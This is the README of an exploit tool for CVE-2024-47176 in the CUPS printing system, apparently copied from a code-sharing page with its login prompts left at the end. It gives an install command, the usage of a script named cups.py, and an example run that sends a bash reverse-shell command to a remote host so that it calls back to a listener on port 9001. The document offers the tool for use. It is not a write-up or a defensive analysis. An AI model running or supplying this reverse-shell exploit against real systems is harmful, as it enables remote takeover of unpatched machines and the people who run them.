# CVE-2024-47176 - CUPS Exploit
This exploit leverages a vulnerability in CUPS to execute arbitrary commands on a remote host.
## Installation
To install the required dependencies, run:
```bash
pip install -r requirements.txt
```
## Exploit
```bash
python cups.py <listening host> <remote host> <command>
```
```bash
python cups.py 10.10.10.10 10.10.10.11 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view